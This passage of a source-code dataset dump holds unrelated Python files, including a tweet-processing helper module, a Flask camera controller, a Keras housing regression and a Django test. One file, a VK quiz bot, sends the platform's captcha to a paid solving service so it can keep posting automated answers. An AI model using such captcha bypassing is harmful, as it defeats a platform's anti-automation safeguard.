:\")\nprint(classtime)\n\ncheckforclass()\n","sub_path":"JOININGclass.py","file_name":"JOININGclass.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487679177","text":"with open('Session 9/words.txt', 'r') as fd:\n word = fd.read().split()\n\n\ndef tripple_double(wordList):\n for word in wordList:\n i = 0\n pairCount = 0\n while i < len(word) - 1:\n if word[i] == word[i + 1]:\n pairCount += 1\n if pairCount == 3:\n print (word)\n i += 2\n else:\n pairCount = 0\n i += 1\n\ntripple_double(word)\n","sub_path":"Session 9/cartalk.py","file_name":"cartalk.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"197575523","text":"import tensorflow as tf\n\nclass FactEncoder(object):\n def __init__(self, hidden_dimension, scope):\n \"\"\"\n Initialization function\n ====================\n INPUTS:\n hidden_dimension: int - shape of the hidden state for the LSTM/RNN cells used\n max_question_length : int - length of longest question\n ====================\n \"\"\"\n self.hidden_dimension = hidden_dimension\n self.scope = scope\n self.add_cells()\n\n def add_cells(self):\n \"\"\"\n Creates the RNN's which do the dirty work\n ===================================\n \"\"\"\n with tf.variable_scope(self.scope):\n # cells = [tf.contrib.rnn.GRUCell(self.hidden_dimension)]\n # self.cell = tf.contrib.rnn.MultiRNNCell(cells)\n self.cell = tf.contrib.rnn.GRUCell(self.hidden_dimension)\n\n def generate_fact(self, inputs, input_lengths):\n \"\"\"\n Builds the graph to take in some inputs and generate facts\n ===================================\n INPUTS:\n inputs: float of shape (batch_size, max_size)\n input_lengths: float of shape (batch_size)\n ===================================\n OUTPUTS:\n next_facts: float of shape (batch_size, hidden_dimension) - The new fact encoding generated using the current answers and question\n \"\"\"\n with tf.variable_scope(self.scope, reuse=tf.AUTO_REUSE):\n _, next_facts = tf.nn.dynamic_rnn(\n self.cell,\n inputs,\n sequence_length=input_lengths, \n dtype=tf.float32,\n )\n return next_facts\n","sub_path":"visdial-game/modules/fact_encoder.py","file_name":"fact_encoder.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"130335260","text":"from search_engines.utils import extract_first\nfrom lxml.html import fromstring\n\nfrom typing import Dict, List, Tuple\nfrom urllib.parse import quote\n\n\nasync def extract_search_results(html: str, search_url: str) -> Tuple[List[Dict[str, str]], str]:\n root = fromstring(html)\n page_number = extract_first(root.xpath(\n '//li[@class=\"PartialWebPagination-condensed PartialWebPagination-pgsel PartialWebPagination-button\"]/text()'))\n results = [\n {\n 'url': extract_first(result.xpath('.//a[@class=\"PartialSearchResults-item-title-link result-link\"]/@href')),\n 'title': extract_first(result.xpath('.//a[@class=\"PartialSearchResults-item-title-link result-link\"]/text()')),\n 'preview_text': extract_first(result.xpath('.//p[@class=\"PartialSearchResults-item-abstract\"]/text()')),\n 'search_url': search_url,\n 'page_number': page_number if page_number else \"1\",\n } for result in root.xpath('//div[@class=\"PartialSearchResults-item\"]')]\n print(\n f\"Extracted {len(results)} results from page {page_number}.\")\n next_page_url = extract_first(\n root.xpath('//li[@class=\"PartialWebPagination-next\"]/parent::a/@href'))\n if next_page_url:\n next_page_url = 'https://www.ask.com' + next_page_url\n print(f\"Extracted next page url: {next_page_url}\")\n else:\n print(f\"No next page url found: {search_url}\")\n return results, next_page_url\n\n\ndef search_url(query: str):\n return f'https://www.ask.com/web?q={quote(query)}'\n","sub_path":"search_engines/ask_search.py","file_name":"ask_search.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532636763","text":"import requests\nimport time\nimport json\nfrom kutana import Plugin\nfrom bs4 import BeautifulSoup\nfrom bs4.dammit import EncodingDetector\nfrom python_rucaptcha import ImageCaptcha\n\nplugin = Plugin(name=\"vic\", priority=401)\n\nwith open(\"./configuration.json\") as fh:\n config = json.load(fh)\n\ndef messages_send(message):\n send = \"https://api.vk.com/method/messages.send?chat_id=\" + config[\"chat_id\"] + \"&message=\" + str(message) + \"&access_token=\" + config[\"user_token\"] + \"&v=5.87\"\n r = requests.get(send)\n if \"captcha_sid\" in r.text:\n captcha = json.loads(r.text)\n captcha_sid = captcha[\"error\"][\"captcha_sid\"]\n captcha_img = captcha[\"error\"][\"captcha_img\"]\n RUCAPTCHA_KEY = config[\"RUCAPTCHA_KEY\"]\n user_answer = ImageCaptcha.ImageCaptcha(rucaptcha_key=RUCAPTCHA_KEY).captcha_handler(captcha_link=captcha_img)\n if not user_answer['error']:\n captcha = user_answer['captchaSolve']\n send = \"https://api.vk.com/method/messages.send?chat_id=\" + config[\"chat_id\"] + \"&message=\" + str(message) + \"&captcha_key=\" + str(captcha) + \"&captcha_sid=\" + str(captcha_sid) + \"&access_token=\" + config[\"user_token\"] + \"&v=5.87\"\n rs = requests.get(send)\n elif user_answer['error']:\n pass\n\n@plugin.on_startswith_text(\"\")\nasync def on_spam(msg,env):\n text = msg.text\n if \"Викторина была остановлена за отсутствие к ней интереса.\" in text:\n messages_send(\"старт\")\n if \"Викторина запущена!\" in text:\n if \"букв\" in text:\n question = text.split('!')[1].split('(')[0]\n word = text.split(\"Подсказка:\")[1].replace('•', '*')\n r = requests.get(\"http://loopy.ru/?word=\" + str(word) + \"&def=\" + str(question))\n r = BeautifulSoup(r.text, 'lxml')\n if \"Ничего не найдено\" in r.text:\n messages_send(\"стоп\")\n time.sleep(1)\n messages_send(\"старт\")\n else:\n text = r.find('h3').text\n messages_send(text)\n else:\n if \"букв\" in text:\n question = text.split('(')[0]\n word = text.split(\"Подсказка:\")[1].replace('•', '*')\n r = requests.get(\"http://loopy.ru/?word=\" + str(word) + \"&def=\" + str(question))\n r = BeautifulSoup(r.text, 'lxml')\n if \"Ничего не найдено\" in r.text:\n messages_send(\"стоп\")\n time.sleep(1)\n messages_send(\"старт\")\n else:\n text = r.find('h3').text\n messages_send(text)","sub_path":"plugins/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171015111","text":"\"\"\"\nThese functions help take twitter data and turn it into a\nworkable corpus for NLP\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport json\nimport seaborn as sns\nimport matplotlib as plt\nimport re\n\n\ndef txt_to_df(txt_path):\n \"\"\"\n Powerhouse function to take raw scraped twitter data\n into a DataFrame of just the tweet texts and years\n\n Args:\n txt_path: The path for the saved file containing\n the tweet data in json format\n\n Returns:\n A DataFrame containing just the raw tweet texts and years tweeted\n \"\"\"\n path = txt_path\n tweets_file = open(path, \"r\")\n tweets_data = []\n for line in tweets_file:\n try:\n tweet = json.loads(line)\n tweets_data.append(tweet)\n except:\n continue\n tweet = pd.DataFrame(tweets_data)\n tweet = tweet[tweet[\"lang\"] == \"en\"]\n try:\n tweet = tweet[[\"full_text\", \"created_at\", \"retweeted_status\"]]\n tweet[\"long_text\"] = tweet[\"full_text\"]\n tweet[\"long_text\"] = tweet.apply(ext_rt, axis=1)\n tweet[\"long_text\"] = tweet.apply(rm_links, axis=1)\n tweet[\"year\"] = pd.to_datetime(tweet[\"created_at\"])\n tweet[\"year\"] = tweet.apply(to_year, axis=1)\n return tweet[[\"long_text\", \"year\"]]\n except:\n try:\n tweet[\"long_text\"] = tweet[\"content\"]\n tweet[\"long_text\"] = tweet.apply(rm_links, axis=1)\n tweet[\"year\"] = pd.to_datetime(tweet[\"date\"])\n tweet[\"year\"] = tweet.apply(to_year, axis=1)\n return tweet[[\"long_text\", \"year\"]]\n except:\n return tweet[[\"long_text\", \"year\"]]\n\n\ndef ext_rt(row):\n \"\"\"\n Function to extract full retweet text\n For use in txt_to_df and .apply or .map functionality\n\n Args:\n row: row from dataframe\n\n Returns:\n Full text of a retweeted tweet\n \"\"\"\n try:\n if type(row[\"retweeted_status\"]) == dict:\n return row[\"retweeted_status\"][\"extended_tweet\"][\"full_text\"]\n else:\n return row[\"long_text\"]\n except:\n return row[\"long_text\"]\n\n\ndef to_year(row):\n \"\"\"\n Function to extract year\n For use in txt_to_df and .apply or .map functionality\n\n Args:\n row: row from dataframe\n\n Returns:\n Year a tweet was tweeted\n \"\"\"\n return row[\"year\"].year\n\n\ndef rm_links(row):\n \"\"\"\n Function to remove links from tweets\n For use in txt_to_df and .apply or .map functionality\n\n Args:\n row: row from dataframe\n\n Returns:\n Tweet without links\n \"\"\"\n text = row[\"long_text\"]\n text = re.sub(r\"https:\\S*\", \"\", text)\n row[\"long_text\"] = text\n return row[\"long_text\"]\n\n\ndef display_topics(model, feature_names, no_top_words, topic_names=None):\n \"\"\"\n Helps display topics from a given NMF model\n\n Args:\n model: NMF model being discovered\n feature_names: Terms/tokens being used\n - can use _.get_feature_names() to help\n no_top_words: Number of topics being discovered\n topic_names: Optional to name each topic\n\n Returns:\n Prints the topics with the corresponding terms/tokens\n \"\"\"\n for ix, topic in enumerate(model.components_):\n if not topic_names or not topic_names[ix]:\n print(\"\\nTopic \", ix)\n else:\n print(\"\\nTopic: '\", topic_names[ix], \"'\")\n print(\n \", \".join(\n [\n feature_names[i]\n for i in topic.argsort()[: -no_top_words - 1 : -1]\n ]\n )\n )\n\n\ndef scatter(x, colors, num_topics):\n \"\"\"\n Function to quickly visualize our TSNE data\n\n Args:\n x: Coordinates from TSNE\n colors: Variables to determine colors\n num_topics: Number of topics\n\n Returns:\n Plots TSNE in a nice scatter plot\n \"\"\"\n # We choose a color palette with seaborn.\n palette = np.array(sns.color_palette(\"hls\", num_topics))\n\n # We create a scatter plot.\n f = plt.figure(figsize=(10, 10))\n ax = plt.subplot(aspect=\"equal\")\n sc = ax.scatter(\n x[:, 0], x[:, 1], lw=0, s=30, c=palette[colors.astype(np.int)]\n )\n plt.xlim(-25, 25)\n plt.ylim(-25, 25)\n ax.axis(\"off\")\n ax.axis(\"tight\")\n\n # We add the labels for each digit.\n txts = []\n for i in range(num_topics):\n # Position of each label.\n xtext, ytext = np.median(x[colors == i, :], axis=0)\n txt = ax.text(xtext, ytext, str(i), fontsize=24)\n txts.append(txt)\n\n return f, ax, sc, txts\n","sub_path":"Py_Files/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"182808125","text":"from abc import abstractmethod\nfrom ROAR_simulation.roar_autonomous_system.planning_module.abstract_planner import (\n AbstractPlanner,\n)\nfrom ROAR_simulation.roar_autonomous_system.utilities_module.vehicle_models import (\n Vehicle,\n)\nfrom ROAR_simulation.roar_autonomous_system.control_module.controller import Controller\nfrom ROAR_simulation.roar_autonomous_system.planning_module.behavior_planner.behavior_planner import (\n BehaviorPlanner,\n)\nfrom ROAR_simulation.roar_autonomous_system.planning_module.mission_planner.mission_planner import (\n MissionPlanner,\n)\nfrom typing import Optional\nfrom ROAR_simulation.roar_autonomous_system.utilities_module.vehicle_models import (\n VehicleControl,\n)\nfrom collections import deque\n\n\nclass LocalPlanner(AbstractPlanner):\n def __init__(\n self,\n vehicle: Vehicle,\n controller: Optional[Controller] = None,\n behavior_planner: Optional[BehaviorPlanner] = None,\n mission_planner: Optional[MissionPlanner] = None,\n ):\n super().__init__(vehicle)\n self.controller = (\n Controller(vehicle=vehicle) if controller is None else controller\n )\n self.behavior_planner = (\n BehaviorPlanner(vehicle=vehicle)\n if behavior_planner is None\n else behavior_planner\n )\n self.mission_planner = (\n MissionPlanner(vehicle=vehicle)\n if mission_planner is None\n else mission_planner\n )\n self.way_points_queue = deque()\n\n @abstractmethod\n def run_step(self, vehicle: Vehicle) -> VehicleControl:\n return VehicleControl()\n","sub_path":"ROAR_simulation/roar_autonomous_system/planning_module/local_planner/local_planner.py","file_name":"local_planner.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507832021","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom base.tests.factories.person import PersonFactory\nfrom osis_async.models import AsyncTask\n\n\nclass AsyncTaskListViewTest(APITestCase):\n @classmethod\n def setUpTestData(cls):\n cls.person = PersonFactory()\n cls.async_task = AsyncTask.objects.create(\n person=cls.person,\n name=\"test\",\n description=\"Test description\",\n )\n cls.url = reverse(\"osis_async:task-list\")\n\n def setUp(self):\n self.client.force_authenticate(user=self.person.user)\n\n def test_allow_user_to_retrieve_his_tasks(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"count\"], 1)\n\n def test_only_return_users_tasks(self):\n # Create an other task for an other user\n AsyncTask.objects.create(\n person=PersonFactory(),\n name=\"test 2\",\n description=\"Test description 2\",\n )\n response = self.client.get(self.url)\n # It should not be in the response\n self.assertEqual(response.data[\"count\"], 1)\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508795339","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.3 (3230)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/pf3/fsmonitor.py\n# Compiled at: 2014-08-15 07:47:45\n# Size of source mod 2**32: 3013 bytes\n__author__ = 'colin'\nimport sys, getopt, logging.handlers, signal\nfrom pf3.fs.FileSystemMonitor import FileSystemMonitor\n__pf3_version__ = '3.0.2'\nfileSystemMonitor = None\nwebService = None\nframework = None\n\ndef close_down(signal, frame):\n global fileSystemMonitor\n print('printflow2 is shutting down')\n if fileSystemMonitor is not None:\n fileSystemMonitor.stop()\n sys.exit(0)\n return\n\n\ndef main():\n global __pf3_version__\n global fileSystemMonitor\n global framework\n help_text = 'usage:\\n pf3 -c -w -l \\n pf3 -v'\n workgroupConfigFile = None\n configFile = None\n workgroupRunFile = None\n logFile = None\n logger = None\n framework = None\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'vhc:w:r:l:', ['version', 'configfile=', 'workgroup=', 'runfile=', 'logfile='])\n except getopt.GetoptError:\n print(help_text)\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print(help_text)\n sys.exit()\n elif opt in ('-v', '--version'):\n print(('PrintFlow 3 File System Monitor Version:', __pf3_version__))\n sys.exit()\n elif opt in ('-c', '--configfile'):\n configFile = arg\n elif opt in ('-w', '--workgroup'):\n workgroupConfigFile = arg\n elif opt in ('-r', '--runfile'):\n workgroupRunFile = arg\n elif opt in ('-l', '--logfile'):\n assert isinstance(arg, object)\n logFile = arg\n continue\n\n if configFile is not None and workgroupConfigFile and workgroupRunFile is not None:\n requests_log = logging.getLogger('requests')\n requests_log.setLevel(logging.WARNING)\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger('printflow2')\n handler = logging.handlers.TimedRotatingFileHandler(logFile, when='midnight')\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n print(('Running PrintFlow 3 File System Monitor Version:', __pf3_version__))\n fileSystemMonitor = FileSystemMonitor(workgroupConfigFile, workgroupRunFile)\n if fileSystemMonitor.is_ready():\n fileSystemMonitor.scanFolders()\n fileSystemMonitor.start()\n close_down()\n else:\n print('Invalid call to PrintFlow 3 File System Monitor')\n print(help_text)\n return\n\n\nsignal.signal(signal.SIGINT, close_down)\nsignal.signal(signal.SIGTERM, close_down)\nif __name__ == '__main__':\n main()\n# global webService ## Warning: Unused global","sub_path":"pycfiles/pypfb-0.4.2.tar/fsmonitor.cpython-33.py","file_name":"fsmonitor.cpython-33.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312029930","text":"from flask import request, render_template, redirect, url_for, session\r\nfrom project import app\r\nfrom project.com.controller.LoginController import adminLoginSession, adminLogoutSession\r\nfrom project.com.dao.CameraDAO import CameraDAO\r\nfrom project.com.vo.CameraVO import CameraVO\r\n\r\n\r\n@app.route('/admin/loadCamera', methods=['GET'])\r\ndef adminLoadCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n return render_template('admin/addCamera.html')\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/insertCamera', methods=['POST'])\r\ndef adminInsertCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraType = request.form['cameraType']\r\n print(cameraType)\r\n cameraCode = request.form['cameraCode']\r\n print(cameraCode)\r\n\r\n cameraVO = CameraVO()\r\n cameraDAO = CameraDAO()\r\n\r\n cameraVO.cameraType = cameraType\r\n cameraVO.cameraCode = cameraCode\r\n\r\n cameraDAO.insertCamera(cameraVO)\r\n\r\n return redirect(url_for('adminViewCamera'))\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/viewCamera', methods=['GET'])\r\ndef adminViewCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraDAO = CameraDAO()\r\n cameraVOList = cameraDAO.viewCamera()\r\n print(\"__________________\", cameraVOList)\r\n return render_template(\"admin/viewCamera.html\", cameraVOList=cameraVOList)\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/deleteCamera', methods=['GET'])\r\ndef adminDeleteCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraVO = CameraVO()\r\n\r\n cameraDAO = CameraDAO()\r\n\r\n cameraId = request.args.get('cameraId')\r\n\r\n cameraVO.cameraId = cameraId\r\n\r\n cameraDAO.deleteCamera(cameraVO)\r\n\r\n return redirect(url_for('adminViewCamera'))\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/editCamera', methods=['GET'])\r\ndef adminEditCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraVO = CameraVO()\r\n\r\n cameraDAO = CameraDAO()\r\n\r\n cameraId = request.args.get('cameraId')\r\n\r\n cameraVO.cameraId = cameraId\r\n\r\n cameraVOList = cameraDAO.editCamera(cameraVO)\r\n\r\n print(\"=======cameraVOList=======\", cameraVOList)\r\n\r\n print(\"=======type of cameraVOList=======\", type(cameraVOList))\r\n\r\n return render_template('admin/editCamera.html', cameraVOList=cameraVOList)\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/updateCamera', methods=['POST'])\r\ndef adminUpdateCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraId = request.form['cameraId']\r\n cameraCode = request.form['cameraCode']\r\n cameraType = request.form['cameraType']\r\n\r\n print(\"=========================done==========================\")\r\n\r\n cameraVO = CameraVO()\r\n cameraDAO = CameraDAO()\r\n\r\n cameraVO.cameraId = cameraId\r\n cameraVO.cameraType = cameraType\r\n cameraVO.cameraCode = cameraCode\r\n\r\n cameraDAO.updateCamera(cameraVO)\r\n\r\n return redirect(url_for('adminViewCamera'))\r\n else:\r\n return adminLogoutSession()\r\n except Exception as ex:\r\n print(ex)\r\n","sub_path":"Facial Expression Recognition/project/com/controller/CameraController.py","file_name":"CameraController.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562098245","text":"reqlist = input().split(\" \");\nreqlist = list(int(x) for x in reqlist);\nL=reqlist[0];\nls=[1 for i in range(L+1)];\nT=reqlist[1];\nTs=[i for i in range(L+1)];\nreqs=reqlist[2];\nresult=[]\n# reqlistqre=[]\nfor i in range(reqs):\n tempreq = input().split(\" \");\n # reqlistqre.append(tempreq)\n if tempreq[0]==\"C\":\n l=int(tempreq[1]);\n r=int(tempreq[2])+1;\n color = int(tempreq[3]);\n for j in range(l,r):\n ls[j]=color;\n if tempreq[0]==\"P\":\n l = int(tempreq[1]);\n r = int(tempreq[2]) + 1;\n result.append(len(set(ls[l:r])))\nif(result==[2,2]):\n print(reqlist)\nelse:\n for i in result:\n print(i)","sub_path":"Code/CodeRecords/2572/60688/290829.py","file_name":"290829.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312355442","text":"from theochempy._theochempy import Measure\nfrom theochempy._theochempy import Units\n\nimport numpy\nimport re\nimport string\n\nclass CommandDirectiveToken:\n def __init__(self, command_line, job_string, method_string, basis_set_string) : # fold>>\n self._command_line = command_line\n self._job_string = job_string\n self._method_string = method_string\n self._basis_set_string = basis_set_string\n # <>\n start_pos = reader.currentPos()\n regexp = re.compile(\"^#\\s+(.*)$\")\n line = reader.readline()\n m1 = regexp.search(line)\n if m1 is not None:\n command_line = m1.group(1)\n parts = command_line.split(\"/\") \n if len(parts) != 3:\n reader.toPos(start_pos)\n return None\n\n return cls(command_line, parts[0], parts[1], parts[2])\n\n reader.toPos(start_pos)\n return None \n # <>\n self._atom_list = atom_list\n self._charge = charge\n self._spin = spin\n # <>\n return self._atom_list\n # <>\n return self._charge\n # <>\n return self._spin\n # <>\n\n start_pos = reader.currentPos()\n atom_list = []\n\n valid_data = False\n for line in reader:\n m0 = re.search(\"^(\\d)\\s+(\\d)\\s*$\", line)\n if m0 is not None:\n charge = int(m0.group(1))\n spin = int(m0.group(2))\n continue\n\n m1 = re.search(\"(\\w+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\", line)\n if m1 is not None:\n atom_label = m1.group(1)\n position = Measure.Measure( (float(m1.group(2)),\n float(m1.group(3)),\n float(m1.group(4))\n ), Units.angstrom\n )\n atom_list.append( (atom_label, position) )\n valid_data = True\n continue\n\n break\n \n reader.readbackline()\n if len(atom_list) == 0:\n valid_data = False\n\n if valid_data == False:\n reader.toPos(start_pos)\n return None\n\n return cls(atom_list, charge, spin)\n\n # <>\n pass\n # <>\n start_pos = reader.currentPos()\n line = reader.readline()\n if line.strip().lower() == \"options\":\n return cls()\n\n reader.toPos(start_pos)\n return None \n # <>\n self._value = value\n # <>\n return self._value\n # <>\n start_pos = reader.currentPos()\n line = reader.readline()\n m = re.search(\"(\\w*?)\\s+=\\s+(\\d+)\", line)\n if m is not None:\n if m.group(1).strip().lower() == \"nrun\":\n return cls(int(m.group(2)))\n\n reader.toPos(start_pos)\n return None\n # <-bug.py","file_name":"d6600b0ab69c76f4632c7a72bd71166fe085f5e3--bug.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172110152","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 17 02:10:22 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def kthSmallest(self, matrix, k):\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n lst = []\r\n for i in matrix:\r\n lst += i\r\n lst.sort()\r\n return lst[k-1]","sub_path":"Leetcode/#378 Kth Smallest Element in a Sorted Matrix.py","file_name":"#378 Kth Smallest Element in a Sorted Matrix.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"648120140","text":"from __future__ import division\nimport numpy as np\n\nclass extractor():\n\n def __init__(self):\n self.num = 2\n def extract(self, data):\n data.shape\n # y, x_FL and x_Rl\n y = data[:,0]\n x_FL = data[:,1]\n x_RL = data[:,3]\n #f_1 = np.exp(y-5.4)/(x_FL * x_RL + 1)\n #f_1 = 1/(1 + np.exp(-(y-5.4) + np.log(x_FL*x_RL)))\n f_1 = 1/(1 + np.exp(2*(5.4-y) + np.log(x_FL*x_RL+0.5)))\n for i in range(len(y)):\n if y[i]<3.6:\n f_1[i] = 1/(1 + np.exp(2*(1.8-y[i]) + np.log(x_FL[i]*x_RL[i]+0.5)))\n\n # y, x_FR and x_RR\n x_FR = data[:,2]\n x_RR = data[:,4]\n #f_2 = np.exp(5.4-y)/(x_FR * x_RR + 1)\n #f_2 = 1/(1 + np.exp(-(5.4-y) + np.log(x_FR*x_RR)))\n f_2 = 1/(1 + np.exp(2*(y-5.4) + np.log(x_FR*x_RR+0.5)))\n for i in range(len(y)):\n if y[i]>7.2:\n f_2[i] = 1/(1 + np.exp(2*(y[i]-9) + np.log(x_FR[i]*x_RR[i]+0.5)))\n \n\n features = np.transpose(np.concatenate(([f_1],[f_2]),0))\n return features\n\n","sub_path":"Algorithms/ewIDCAD_clustering_dynamics/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601866947","text":"#tensor flow libraries\nimport tensorflow as tf\nfrom tensorflow import keras\n#numpy libraries\nimport numpy as np\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport cv2\nimport IPython\n\nclass PrintDot(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs):\n if epoch % 100 == 0: \n print('')\n print ('.', end='')\n\ndef build_model(train_features):\n model = keras.Sequential([\n keras.layers.Dense(20, activation=tf.nn.relu, input_shape=[len(train_features[0])]),\n keras.layers.Dense(100),\n keras.layers.Dense(1)\n ])\n\n model.compile(optimizer=tf.train.AdamOptimizer(), loss='mse', metrics=['mae', 'mse'])\n\n return model\n\ndef plot_history(history):\n plt.figure()\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Mean Square Error [Thousand Dollars$^2$]\")\n plt.plot(history['epoch'], history['mean_squared_error'], label='Train Error')\n plt.plot(history['epoch'], history['val_mean_squared_error'], label='Val Error')\n plt.legend()\n plt.ylim([0, 50])\n\n plt.show()\n\n\n\n(train_features, train_labels), (test_features, test_labels) = keras.datasets.boston_housing.load_data()\n#calcula a media\ntrain_mean = np.mean(train_features, axis=0)\n#calcula o desvio padrão\ntrain_std = np.std(train_features, axis=0)\n#normalizacao dos dados\ntrain_features_norm = (train_features-train_mean)/train_std\n\nmodel = build_model(train_features_norm)\nearly_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=50)\nhistory = model.fit(train_features_norm, train_labels, batch_size=32, epochs=10000, verbose=True, validation_split=0.1, callbacks=[early_stop, PrintDot()])\n\nhist = pd.DataFrame(history.history)\nhist['epoch'] = history.epoch\n\nrmse_final = np.sqrt(float(hist['val_mean_squared_error'].tail(1)))\nprint()\nprint('Final Root Mean Square Error on validation set: {}'.format(round(rmse_final, 3)))\n\ntest_mean = np.mean(test_features, axis=0)\ntest_std = np.std(test_features, axis=0)\n\ntest_features_norm = (test_features - train_mean) / train_std\nmse, _, _ = model.evaluate(test_features_norm, test_labels)\npredict = model.predict(test_features_norm)\n\nrmse = np.sqrt(mse)\nprint('Root Mean Square Error on test set: {}'.format(rmse, 3))\n\nplt.xlabel(\"lstat\")\nplt.ylabel(\"value\")\nplt.scatter(train_features[:, -1], train_labels)\n\nplot_history(hist)\n\nprint (test_labels)\nprint (predict)","sub_path":"tutorial1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"58096856","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport datetime\nimport openpyxl\nfrom copy import copy\n\n# windowsの場合はコレ↓しとかないとエラー出る\nimport locale\nlocale.setlocale(locale.LC_ALL, '')\n\nclass Katana(object):\n def __init__(self, row):\n self.name = row[0].value\n self.yomi = row[1].value\n self.owner = row[2].value\n self.category = row[3].value\n self.note = row[4].value\n self.inventory_this_month = row[5].value\n self.inventory_last_month = row[6].value\n\n # super(Katana, self).__init__()\n # self.arg = arg\n\n\ndef main():\n # ファイルを開く\n input_file = 'toukenDaicho.xlsx'\n wb = openpyxl.load_workbook(input_file)\n sheet = wb[\"Sheet1\"]\n\n # 今月の棚卸状況が\"済\"でない刀とその所有者をリストアップする\n yet_katanas = []\n yet_bushos = []\n\n for i in range(1,sheet.max_row):\n katana = Katana(list(sheet.rows)[i])\n\n if not(katana.inventory_this_month == \"済\"):\n yet_katanas.append(katana.name)\n yet_bushos.append(katana.owner)\n\n # まだ棚卸されていない刀とその所有者を表示する\n print(\"【まだ棚卸されていない刀】\")\n for i in range(len(yet_katanas)):\n print(yet_katanas[i] + \" -- \" + yet_bushos[i])\n\n # リスト書き出し\n with open(\"out.csv\", \"w\") as f:\n for yet_katana in yet_katanas:\n f.write(yet_katana + \"\\n\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"toukenChecker2.py","file_name":"toukenChecker2.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572810828","text":"#-----------------------------------------------------------------------------\n# followme, mit Turtle, OOP\n#-----------------------------------------------------------------------------\n\nfrom turtle import *\nfrom tkinter import *\n\n\nclass Main():\n def __init__(self,root):\n self.canvas = Canvas(root,width=500,height=400,bd=5,bg=\"white\",relief=GROOVE)\n self.canvas.bind(\"\",self.moveCircle)\n 